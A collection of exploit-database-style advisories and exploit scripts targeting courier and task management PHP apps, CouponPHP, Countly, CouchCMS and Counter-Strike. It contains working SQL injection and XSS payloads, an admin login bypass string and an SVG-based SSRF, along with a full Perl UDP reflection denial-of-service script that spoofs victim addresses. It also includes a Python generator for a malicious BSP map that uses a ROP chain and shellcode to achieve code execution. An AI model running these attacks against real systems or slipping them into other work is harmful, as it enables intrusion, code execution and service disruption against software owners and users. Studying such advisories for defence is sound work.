# Date: 2020-12-11
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
Step 1. Log into application with credentials
Step 2. Click on Branch
Step 3. Select New Branch http://127.0.0.1/index.php?page=new_branch
Step 4. Fill the form , click on save
Step 5. Capture the request to the "/ajax.php?action=save_branch" page in Burp Suite.
Step 6. Save request and run sqlmap on request file using command " sqlmap -r request --time-sec=5 --dbs "
Step 7. The injection succeeds and discloses the contents of all databases.
---
Parameter: MULTIPART street ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: -----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="id"
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="street"
11111111111' AND (SELECT 8687 FROM (SELECT(SLEEP(5)))XZFt) AND 'OQNu'='OQNu
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="city"
111111111
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="state"
1111111111
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="zip_code"
11111111111111
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="country"
1111111111111
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="contact"
111111111
-----------------------------12317926718649295872939507245--
---
# Exploit Title: Courier Management System 1.0 - 'First Name' Stored XSS
# Exploit Author: Zhaiyi (Zeo)
# Date: 2020-12-11
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
Step 1: Log in to the CMS with any valid user credentials.
Step 2: Click on the logged in username on header and select Manage Account.
Step 3: Rename the user First Name or Last Name to
"<script>alert(1111)</script>".
Step 4: Update Profile and this will trigger the XSS.
Step 5: Log out and log in again; the page will display the domain name.
# Title : Courier Management System - Sql Injection and non-persistent XSS login portal
# Date: 17 January 2017
# Exploit Author: Sibusiso Sishi sibusiso@ironsky.co.za
# Tested on: Windows7 x32
# Vendor: http://couriermanageme.sourceforge.net/
# Version: not supplied
# Download Software: https://sourceforge.net/projects/couriermanageme/files/
#################################################
## About The Product : ##
Courier Management System is the simplest solution for a Courier & Cargo Tracking business. If you need to enable a tracking option on your existing or new website, this is the quickest software solution. You can install it yourself, or we do the installation and brand it in your name on your hosting. The Courier Software is very easy to set up and manage, with powerful administration. It provides an online tracking system for consignment and shipping details for international or domestic shipping.
## Vulnerability : ##
The login portal is vulnerable to SQLi and cross-site scripting attacks
-HTTP Method : POST
POST /cms/login.php HTTP/1.1
Host: 192.168.19.135
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.19.135/cms/login.php
Cookie: PHPSESSID=q446r5fqav1qlljb7cohd29r85
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
txtusername=test&txtpassword=test&OfficeName=Fast+Courier+-+Jalgaon&Submit=Login+Now
- Sqlmap command: sqlmap -r exploit.txt
- Sqlmap Output :
sqlmap identified the following injection point(s) with a total of 824 HTTP(s) requests:
---
Parameter: txtpassword (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
Payload: txtusername=test&txtpassword=test' OR NOT 5887=5887#&OfficeName=Fast Courier - Jalgaon&Submit=Login Now
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: txtusername=test&txtpassword=test' AND (SELECT 9962 FROM(SELECT COUNT(*),CONCAT(0x71766a6b71,(SELECT (ELT(9962=9962,1))),0x717a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- CqJl&OfficeName=Fast Courier - Jalgaon&Submit=Login Now
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: txtusername=test&txtpassword=test' OR SLEEP(5)-- VMai&OfficeName=Fast Courier - Jalgaon&Submit=Login Now
Parameter: txtusername (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: txtusername=test' RLIKE (SELECT (CASE WHEN (9742=9742) THEN 0x74657374 ELSE 0x28 END))-- FJke&txtpassword=test&OfficeName=Fast Courier - Jalgaon&Submit=Login Now
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: txtusername=test' AND (SELECT 6984 FROM(SELECT COUNT(*),CONCAT(0x71766a6b71,(SELECT (ELT(6984=6984,1))),0x717a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nDYx&txtpassword=test&OfficeName=Fast Courier - Jalgaon&Submit=Login Now
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: txtusername=test' AND (SELECT * FROM (SELECT(SLEEP(5)))Aols)-- LarG&txtpassword=test&OfficeName=Fast Courier - Jalgaon&Submit=Login Now
---
[16:59:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.23, PHP 5.6.24
back-end DBMS: MySQL >= 5.0
# # # # #
# Vulnerability: Admin Login Bypass & SQLi
# Date: 13.01.2017
# Vendor Homepage: http://scriptfirm.com/
# Script Name: Courier Business Website Script
# Script Buy Now: http://scriptfirm.com/courier-business-website
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
# # # # #
# # # # #
# Exploit Title: CouponPHP Script v3.1 - SQL Injection
# Google Dork: N/A
# Date: 27.03.2017
# Vendor Homepage: http://couponphp.com/
# Software: http://couponphp.com/demos
# Demo: http://newdemo2.couponphp.com
# Demo: http://newdemo3.couponphp.com
# Version: 3.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/go.php?coupon_id=1&code=[SQL]
# users
# id
# username
# password
# # # # #
# # # # #
# Exploit Title: Country on Sale Script - SQL Injection
# Google Dork: N/A
# Date: 09.03.2017
# Vendor Homepage: http://www.websitescripts.org/
# Software: http://www.websitescripts.org/website-scripts/country-on-sale-script/prod_53.html
# Demo: http://www.websitescripts.org/demo/countryonsalescript/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/read_more.php?newsid=[SQL]
# http://localhost/[PATH]/countries/index.php?id=[SQL]
# 13'+/*!50000union*/+select+1,version(),0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,4,5--+-
# Etc..
# # # # #
############################################################################
# Exploit Title: Countly-server Stored(Persistent) XSS Vulnerability
# Date: Monday - 2018 13 August
# Author: 10:10AM Team
# Discovered By: Sleepy
# Software Link: https://github.com/Countly/countly-server
# Version: All Version
# Category: Web-apps
# Security Risk: Critical
# Tested on: GNU/Linux Ubuntu 16.04 - win 10
############################################################################
# Exploit:
# Description:
#
# An attacker can use multiple parameters in the provided link to inject their own data into the database
# of this application; the injected data can then be viewed directly in the event logs panel
# (manage>logger).
# An attacker may use this vulnerability to inject a payload for attacks such as Stored XSS.
# The injected payload is executed every time the target page is visited/refreshed.
#
# Proof of Concept:
#
# Injection URL:
#
# - http://[server_ip]:[api_port]/i?api_key=[api_key]&parameter_1=[payload_1]&parameter_2=[payload_2]&etc...
#
# Execution URL(login to server dashboard and navigate to "event logs" panel):
#
# - http://[server_ip]:[server_port]/dashboard#/[app_key]/manage/logger
#
#
############################################################################
# WE ARE: Sleepy({ssleeppyy@gmail.com}), Mikili({mikili.land@gmail.com})
############################################################################
# CVE-2019-15943
Counter-Strike Global Offensive (vphysics.dll) before 1.37.1.1 allows remote attackers to achieve code execution or denial of service by creating a gaming server and inviting a victim to this server, because a crafted map triggers memory corruption.
### Description:
To trigger this vulnerability we need to modify the class-name value in our PoC; the offset to modify in our PoC is `0x115703`. For example, add the character `"="` at this offset. The PoC file is "mc.bsp".

To model the attack situation we need the following:
First step: copy mc.bsp to `C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo\maps`;
Second step: start the game with our map (mc.bsp); for this, open the game console and enter `map mc`.

After these steps we can see the following:

I used msec.dll (!exploitable), a Windows debugging extension (Windbg) that provides automated crash analysis and security risk assessment [Download msec.dll](https://archive.codeplex.com/?p=msecdbg)
As you can see, msec.dll analyzed this crash and classified it as EXPLOITABLE because the SEH chain is corrupted. This means that an attacker could use this vulnerability for remote code execution.
EDB Note: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47454.bsp
#!/usr/bin/perl
#
# Counter-Strike 1.6 'GameInfo' Query Reflection DoS
# Proof Of Concept
#
# Copyright 2015 (c) Todor Donev
# todor.donev@gmail.com
# http://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
# http://pastebin.com/u/hackerscommunity
#
#
# Disclaimer:
# This or previous program is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use at your own risk and educational
# purpose ONLY!
#
# See also, UDP-based Amplification Attacks:
# https://www.us-cert.gov/ncas/alerts/TA14-017A
#
# # perl cstrike-drdos-poc.pl 46.165.194.16 192.168.1.10 27010
# [ Counter-Strike 1.6 'GameInfo' query reflection dos poc
# [ Sending GameInfo requests: 46.165.194.16 -> 192.168.1.10
# ^C
#
# # tcpdump -i eth0 -c4 port 27010
# tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
# listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
# 00:00:00.000000 IP 192.168.1.10.31337 > masterserver.css.setti.info.27010: UDP, length 25
# 00:00:00.000000 IP masterserver.css.setti.info.27010 > 192.168.1.10.31337: UDP, length 1392
# 00:00:00.000000 IP 192.168.1.10.31337 > masterserver.css.setti.info.27010: UDP, length 25
# 00:00:00.000000 IP masterserver.css.setti.info.27010 > 192.168.1.10.31337: UDP, length 1392
# 4 packets captured
# 4 packets received by filter
# 0 packets dropped by kernel
use strict;
use Socket;
use warnings;
no warnings 'uninitialized';
# Banner, privilege check and argument handling for the PoC: the cstrike
# server, the victim (used as the spoofed source) and an optional port are
# read from @ARGV. Arguments are left in $css / $victim / $port, which the
# subs below read as file-scoped lexicals.
print "[ Counter-Strike 1.6 \'GameInfo\' query reflection dos poc\n";
# Raw sockets need root; $< is the real UID of the running process.
die "[ Sorry, must be run as root. This script use RAW Socket.\n" if ($< != 0);
my $css = (gethostbyname($ARGV[0]))[4]; # IP Address Destination (32 bits), packed 4-byte form
my $victim = (gethostbyname($ARGV[1]))[4]; # IP Address Source (32 bits), packed 4-byte form
my $port = $ARGV[2] || '27015'; # Int between 1 and 65535 Default: 27015
# The port range is validated before the missing-argument check below.
die "[ Port must be between 1 and 65535!\n" if ($port < 1 || $port > 65535);
if (!defined $css || !defined $victim) {
print "[ Usg: $0 <cstrike server> <victim> <port>\n";
print "[ Default port: 27015\n";
print "[ <todor.donev\@gmail.com> Todor Donev\n";
exit;
}
print "[ Sending GameInfo requests: $ARGV[0] -> $ARGV[1]\n";
# Protocol 255 is IPPROTO_RAW. The setsockopt uses bare numeric level/option
# values (0, 1) instead of Socket's named constants, so what it sets is
# OS-dependent; NOTE(review): on Linux, IPPROTO_RAW already implies
# IP_HDRINCL (raw(7)), i.e. the IP header built by iphdr() is sent as-is.
socket(RAW, AF_INET, SOCK_RAW, 255) || die $!;
setsockopt(RAW, 0, 1, 1) || die $!;
# Perl compiles subs before runtime, so main() can be called above its definition.
main();
# Main program
sub main {
# Assembles one frame (IP header + UDP header + A2S_INFO payload) and hands
# it to send_packet(), which loops forever; the frame is built only once.
my $packet;
$packet = iphdr();
$packet .= udphdr();
$packet .= cshdr();
# b000000m...
send_packet($packet);
}
# IP header (Layer 3)
sub iphdr {
# Builds a 20-byte IPv4 header by hand. The source address is $victim and the
# destination is $css: the packet is source-spoofed so the server's reply is
# delivered to the victim (the "reflection"). This is exactly the traffic
# that source-address validation at the network edge (BCP 38 / ingress
# filtering, as discussed in the US-CERT alert referenced above) drops.
my $ip_ver = 4; # IP Version 4 (4 bits)
my $iphdr_len = 5; # IP Header Length (4 bits), in 32-bit words
my $ip_tos = 0; # Differentiated Services (8 bits)
my $ip_total_len = $iphdr_len + 20; # IP Header Length + Data (16 bits)
my $ip_frag_id = 0; # Identification Field (16 bits)
my $ip_frag_flag = 000; # IP Frag Flags (R DF MF) (3 bits)
my $ip_frag_offset = 0000000000000; # IP Fragment Offset (13 bits)
my $ip_ttl = 255; # IP TTL (8 bits)
my $ip_proto = 17; # IP Protocol (8 bits): 17 = UDP
my $ip_checksum = 0; # IP Checksum (16 bits), left zero
# IP Packet
# NOTE(review): several fields are packed as text templates ('H2', 'h2',
# 'B16'), so the wire bytes are the hex/bit rendering of the *string* value,
# not the number itself; with the header-included raw socket the kernel also
# fills in total length and checksum on Linux (raw(7)). Confirm field values
# against a capture before relying on any of them.
my $iphdr = pack(
'H2 H2 n n B16 h2 c n a4 a4',
$ip_ver . $iphdr_len, $ip_tos,
$ip_total_len, $ip_frag_id,
$ip_frag_flag . $ip_frag_offset,
$ip_ttl, $ip_proto, $ip_checksum,
$victim, $css
);
return $iphdr;
}
# UDP Header (Layer 4)
sub udphdr {
# Builds the 8-byte UDP header. The source port is hard-coded to 31337
# (visible in the tcpdump sample in the header) -- a simple detection
# artifact for this particular tool. A zero UDP checksum means "no checksum"
# for UDP over IPv4.
my $udp_src_port = 31337; # UDP Source Port (16 bits) (0-65535)
my $udp_dst_port = $port; # UDP Dest Port (16 bits) (0-65535); file-scoped $port from argument parsing
my $udp_len = 8 + length(cshdr()); # UDP Length (16 bits): header + payload; cshdr() is built again in main()
my $udp_checksum = 0; # UDP Checksum (16 bits), left zero
# UDP Packet
my $udphdr = pack(
'n n n n',
$udp_src_port,
$udp_dst_port,
$udp_len,
$udp_checksum
);
return $udphdr;
}
# Counter-Strike 'GameInfo' request
sub cshdr {
#
# https://developer.valvesoftware.com/wiki/Server_queries
#
# https://developer.valvesoftware.com/wiki/Source_RCON_Protocol
# Requests
# The server responds to 5 queries:
#
# A2S_INFO 'T' (0x54)
# Basic information about the server.
# A2S_PLAYER 'U' (0x55)
# Details about each player on the server.
# A2S_RULES 'V' (0x56)
# The rules the server is using.
# A2A_PING 'i' (0x69)
# Ping the server. (DEPRECATED)
# A2S_SERVERQUERY_GETCHALLENGE 'W' (0x57)
# Returns a challenge number for use in the player and rules query. (DEPRECATED)
#
# Queries should be sent in UDP packets to the listen port of the server.
#
# 25 bytes - A2S_INFO: 0xffffffff header, 'T', then "Source Engine Query\0".
# The tcpdump sample in the header shows a 1392-byte reply to this 25-byte
# request, which is the amplification factor the reflection relies on; the
# mitigation side of that is covered by the US-CERT alert referenced above.
my $query = "\xff\xff\xff\xff\x54"; # 0000 ff ff ff ff 54 53 6f 75 72 63 65 20 45 6e 67 69 ....TSource Engi
$query .= "\x53\x6f\x75\x72\x63"; # 0010 6e 65 20 51 75 65 72 79 00 ne Query.
$query .= "\x65\x20\x45\x6e\x67";
$query .= "\x69\x6e\x65\x20\x51";
$query .= "\x75\x65\x72\x79\x00";
# 'a*' on an already-binary string is an identity pack.
my $cshdr = pack('a*', $query);
return $cshdr;
}
sub send_packet {
# Sends the prebuilt frame ($_[0]) to $css in an endless loop, pausing 400 ms
# between sends (the four-argument select() is the sub-second sleep idiom).
# The destination sockaddr is packed by hand ('Sna4x8' = family, port, addr,
# 8 bytes padding); presumably the port slot (60) is irrelevant for a raw
# IP socket since the UDP header above carries the real port -- confirm.
while(1){
select(undef, undef, undef, 0.40); # Sleep 400 milliseconds
send(RAW, $_[0], 0, pack('Sna4x8', AF_INET, 60, $css)) || die $!;
}
}
So I’ve been holding onto this neat little gem of a .bsp that has four bytes very close to the end of the file that control the memory allocator. See above picture. Works on all supported operating systems last I checked (so Linux, Windows, and macOS), even after a few years.
Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48187.bsp
#!/usr/bin/env python
# Counter Strike: Condition Zero BSP map exploit
# By @Digital_Cold Jun 11, 2017
#
# E-DB Note: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42325.zip (bsp-exploit-source.zip)
#
from binascii import hexlify, unhexlify
from struct import pack, unpack
import math
import mmap
import logging
# Logging setup: every record is printed as "[+] <message>" at INFO level;
# "l" is the module logger used by main() for progress output.
fmt = "[+] %(message)s"
logging.basicConfig(level=logging.INFO, format=fmt)
l = logging.getLogger("exploit")
# Specific to the file
# File offsets into the target map. They are valid only for the specific
# "eip-minimized.bsp" that main() reads; any other .bsp has different lump
# layouts and these constants would need to be re-derived.
INDEX_BUFFER_OFF = 0x92ee0 # ARRAY[int]
VERTEX_BUFFER_INDEXES_OFF = 0xA9174 # ARRAY[unsigned short]
VERTEX_DATA_OFF = 0x37f7c # ARRAY[VEC3], VEC3[float, float, float]
# NOTE(review): the root cause category here is a trusted on-disk length field;
# a loader that bounds-checks this count against the lump size would not
# overrun. Not written to by main() unless the commented line there is enabled.
NUM_EDGES_OFF = 0x70f94 # The length that was fuzzed to cause the crash
# No longer used as could not find a gadget to 'pop, pop, pop esp, ret'
# SEH_OVERWRITE_OFF = 0x4126C
# Initial offset into the index buffer where the function to exploit resides
INITIAL_OFFSET = 0xb130 # this is multiplied by 4 for data type size already
# INDEX_BUFFER
# 0: 20
# 1: 10
# 2: 2 --> Vertex Buffer Indexes
# VERTEX BUFFER INDEXES
# 0: 1
# 1: 2
# 2: 4 --> Vertex Data
# VERTEX DATA
# 0: 1.23, 23423.0, 3453.3
# 1: 1.23, -9.0, 3453.3
# 2: 1.0, 1.0, 1.0
# 3: 1.0, 1.0, 1.0
# 4: 0.0, 1.0, 0.0
# Example:
# a = INDEX_BUFFER[2] ; a = 2
# b = VERTEX_BUFFER[a] ; b = 4
# vec = VERTEX_DATA[b] ; vec = 0.0, 1.0, 0.0
def dw(x):
    """Return the integer *x* packed as one native-endian unsigned 32-bit word.

    Thin wrapper around ``struct.pack("I", x)``; used to emit gadget
    addresses and counters as 4-byte strings.
    """
    packed = pack("I", x)
    return packed
def main():
"""Generate exploit-gen.bsp from eip-minimized.bsp.

Maps the source file copy-on-write, rewrites the index buffer, the
vertex-buffer indexes and the vertex data at the file-specific offsets
defined above so that (per the author's comments) the ROP chain and
shellcode end up on the stack when the map is loaded, then writes the
modified copy to output_file. Python 2 only: print statements, str-typed
byte strings. Reads/writes files in the current working directory.
"""
target_file = "eip-minimized.bsp"
output_file = "exploit-gen.bsp"
print "GoldSource .BSP file corruptor"
print " by @Digital_Cold"
print
# NOTE(review): eager "%"-formatting here vs. the lazy l.info(fmt, arg) form
# used a few lines below; both work, the lazy form is the logging idiom.
l.info("Corrupting target file %s" % target_file)
# Read in and memory map target file
fp = open(target_file, 'rb')
# ACCESS_COPY: the mapping is writable but changes are never written back to
# target_file; the modified copy is dumped to output_file at the end.
mmfile = mmap.mmap(fp.fileno(), 0, access = mmap.ACCESS_READ | mmap.ACCESS_COPY)
fp.close()
VEC3_COUNT = 63
# then come Saved EBP and return address
start_idx = INDEX_BUFFER_OFF + INITIAL_OFFSET
second_idx = VERTEX_BUFFER_INDEXES_OFF
vertex_data_start = VERTEX_DATA_OFF + 12*0x1000 # arbitrary offset, lower causes faults
l.info("Writing to index buffer offset %08x...", start_idx)
l.info("Vertex buffer indexes start %08x", second_idx)
l.info("Vertex data at %08x", vertex_data_start)
# data_buffer collects 4-byte strings; every 3 entries form one VEC3 slot
# (see the final write loop, which consumes it three entries at a time).
data_buffer = []
for i in range(VEC3_COUNT):
for j in range(3):
data_buffer.append(str(chr(0x41+i)*4)) # easy to see pattern in memory
data_buffer.append("\x00\x00\x00\x00") # dont care
data_buffer.append("\x00\x00\x00\x00") # unk1
data_buffer.append("\x00\x00\x00\x00") # unk2
data_buffer.append("\x00\x00\x00\x00") # numVerts (needs to be zero to skip tail call)
data_buffer.append("\x00\x00\x00\x00") # EBP
# All absolute addresses below are tied to the exact hl.exe / steamclient.dll
# builds the author used (each entry is annotated with its module); any
# rebuilt or relocated module presumably invalidates the whole chain.
data_buffer.append(dw(0x01407316)) # Saved Ret --> POP EBP; RET [hl.exe]
# XXX: bug in mona. This is a ptr to VirtualProtectEx!!
# 0x387e01ec, # ptr to &VirtualProtect() [IAT steamclient.dll]
# The triple-quoted literal below is a bare expression statement (not
# assigned to anything); it is effectively a comment.
"""
Register setup for VirtualAlloc() :
--------------------------------------------
EAX = NOP (0x90909090)
ECX = flProtect (0x40)
EDX = flAllocationType (0x1000)
EBX = dwSize
ESP = lpAddress (automatic)
EBP = ReturnTo (ptr to jmp esp)
ESI = ptr to VirtualAlloc()
EDI = ROP NOP (RETN)
--- alternative chain ---
EAX = ptr to &VirtualAlloc()
ECX = flProtect (0x40)
EDX = flAllocationType (0x1000)
EBX = dwSize
ESP = lpAddress (automatic)
EBP = POP (skip 4 bytes)
ESI = ptr to JMP [EAX]
EDI = ROP NOP (RETN)
+ place ptr to "jmp esp" on stack, below PUSHAD
--------------------------------------------
"""
# START ROP CHAIN
# DEP disable ROP chain
# rop chain generated with mona.py - www.corelan.be
#
# useful for finding INT3 gadget - !mona find -s ccc3 -type bin -m hl,steamclient,filesystem_stdio
rop_gadgets = [
#0x3808A308, # INT3 # RETN [steamclient.dll]
0x38420ade, # POP EDX # RETN [steamclient.dll]
0x387e01e8, # ptr to &VirtualAlloc() [IAT steamclient.dll]
0x381236c5, # MOV ESI,DWORD PTR DS:[EDX] # ADD DH,DH # RETN [steamclient.dll]
0x381ebdc1, # POP EBP # RETN [steamclient.dll]
0x381f98cd, # & jmp esp [steamclient.dll]
0x387885ac, # POP EBX # RETN [steamclient.dll]
0x00000001, # 0x00000001-> ebx
0x384251c9, # POP EDX # RETN [steamclient.dll]
0x00001000, # 0x00001000-> edx
0x387cd449, # POP ECX # RETN [steamclient.dll]
0x00000040, # 0x00000040-> ecx
0x386c57fe, # POP EDI # RETN [steamclient.dll]
0x385ca688, # RETN (ROP NOP) [steamclient.dll]
0x0140b00e, # POP EAX # RETN [hl.exe]
0x90909090, # nop
0x385c0d3e, # PUSHAD # RETN [steamclient.dll]
]
# Can be replaced with ANY shellcode desired...
# http://shell-storm.org/shellcode/files/shellcode-662.php
shellcode = "\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B" + \
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9" + \
"\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C" + \
"\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0" + \
"\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B" + \
"\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72" + \
"\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03" + \
"\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47" + \
"\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F" + \
"\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72" + \
"\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66" + \
"\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14" + \
"\x8E\x03\xD3\x52\x68\x78\x65\x63\x01\xFE" + \
"\x4C\x24\x03\x68\x57\x69\x6E\x45\x54\x53" + \
"\xFF\xD2\x68\x63\x6D\x64\x01\xFE\x4C\x24" + \
"\x03\x6A\x05\x33\xC9\x8D\x4C\x24\x04\x51" + \
"\xFF\xD0\x68\x65\x73\x73\x01\x8B\xDF\xFE" + \
"\x4C\x24\x03\x68\x50\x72\x6F\x63\x68\x45" + \
"\x78\x69\x74\x54\xFF\x74\x24\x20\xFF\x54" + \
"\x24\x20\x57\xFF\xD0"
shellcode += "\xeb\xfe" # infinite loop! (we dont want hl.exe to crash)
shellcode += "\xeb\xfe"
shellcode += "\xeb\xfe"
shellcode += "\xeb\xfe"
shellcode += "\xeb\xfe"
# Shellcode is rounded up to whole DWORDs; extra_dwords is how many 3-DWORD
# VEC3 slots the gadget list plus the padded shellcode occupy.
shellcode_dwords = int(math.ceil(len(shellcode)/4.0))
extra_dwords = int(math.ceil((len(rop_gadgets)+shellcode_dwords)/3.0))
# Loop count (needs to be the exact amount of ROP we want to write
data_buffer.append(dw(extra_dwords))
for addr in rop_gadgets:
data_buffer.append(dw(addr))
for b in range(shellcode_dwords):
data = ""
for byte in range(4):
idx = byte + b*4
# pad to nearest DWORD with INT3
if idx >= len(shellcode):
data += "\xcc"
else:
data += shellcode[idx]
data_buffer.append(data)
second_idx += 8000*4 # time 4 because we skip every-other WORD, which means each index has 4 bytes
# 8000 is arbitrary, but it doesn't cause the map load to exit with a FATAL before
# we can exploit the function
# UNCOMMENT TO CHANGE INITIAL SIZE OF OVERFLOW
#mmfile[NUM_EDGES_OFF] = pack("B", 0x41)
# Per iteration: one 4-byte index (8000+i), one 2-byte vertex-buffer index
# (0x1000+i) at an effective stride of 4 (the extra += 2 below), and one
# 12-byte VEC3 filled from three consecutive data_buffer entries.
for i in range(int(math.ceil(len(data_buffer)/3.0))):
mmfile[start_idx+4*i:start_idx+4*(i+1)] = pack("I", 8000+i)
mmfile[second_idx+2*i:second_idx+2*(i+1)] = pack("H", 0x1000+i)
second_idx += 2 # required because the game loads every-other word
# This data will now be on the stack
for j in range(3):
sub_idx = j*4 + i*0xc
data_idx = i*3 + j
towrite = ""
# Slots past the end of data_buffer are zero-filled. (data_idx and
# i*3 + j are the same value; the index below could use data_idx.)
if data_idx >= len(data_buffer):
towrite = "\x00"*4
else:
towrite = data_buffer[i*3 + j]
mmfile[vertex_data_start+sub_idx:vertex_data_start+sub_idx+4] = towrite
#l.debug("Write[%08x] --> offset %d" % (unpack("I", towrite)[0], vertex_data_start+sub_idx))
# write out the corrupted file
outfile = open(output_file, "wb")
outfile.write(mmfile)
outfile.close()
l.info("Wrote %d byte exploit file to %s" % (len(mmfile), output_file))
l.info("Copy to game maps/ directory!")
# Script entry point: run the generator once when executed directly.
if __name__ == "__main__":
    main()
# Exploit Title: CouchCMS 2.2.1 - SSRF via SVG file upload
# Date: 2021-01-25
# Exploit Author: xxcdd
# Vendor Homepage: https://github.com/CouchCMS/CouchCMS
# Software Link: https://github.com/CouchCMS/CouchCMS
# Version: v2.2.1
# Tested on: Windows 7
An issue was discovered in CouchCMS v2.2.1 (https://github.com/CouchCMS/CouchCMS/issues/130) that allows SSRF via an SVG upload to /couch/includes/kcfinder/browse.php.
The upload URL is: /couch/includes/kcfinder/browse.php?nonce=[yournonce]&type=file&CKEditor=f_main_content&CKEditorFuncNum=1&langCode=en
ssrf.svg content:
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="
http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
width="200" height="200">
<image height="200" width="200" xlink:href="http://<test_ip>:1234" />
</svg>
# Exploit Title: CouchCMS 2.2.1 - XSS via SVG file upload
# Date: 2021-01-25
# Exploit Author: xxcdd
# Vendor Homepage: https://github.com/CouchCMS/CouchCMS
# Software Link: https://github.com/CouchCMS/CouchCMS
# Version: v2.2.1
# Tested on: Windows 7
An issue was discovered in CouchCMS v2.2.1 (https://github.com/CouchCMS/CouchCMS/issues/130) that allows XSS via an SVG upload to /couch/includes/kcfinder/browse.php.
The upload URL is: /couch/includes/kcfinder/browse.php?nonce=[yournonce]&type=file&CKEditor=f_main_content&CKEditorFuncNum=1&langCode=en
<http://127.0.0.1/couch/includes/kcfinder/browse.php?nonce=02b16f710f786c61f34e301eae552bdf&type=file&CKEditor=f_main_content&CKEditorFuncNum=1&langCode=en>
xss.svg content:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
<script type="text/javascript">
alert(document.cookie);
</script>
</svg>
# Exploit Title: Cotonti Siena 0.9.19 - 'maintitle' Stored Cross-Site Scripting
# Date: 2021-15-06
# Exploit Author: Fatih İLGİN
# Vendor Homepage: cotonti.com
# Vulnerable Software: https://www.cotonti.com/download/siena_0919
# Affected Version: 0.9.19
# Tested on: Windows 10
# Vulnerable Parameter Type: POST
# Vulnerable Parameter: maintitle
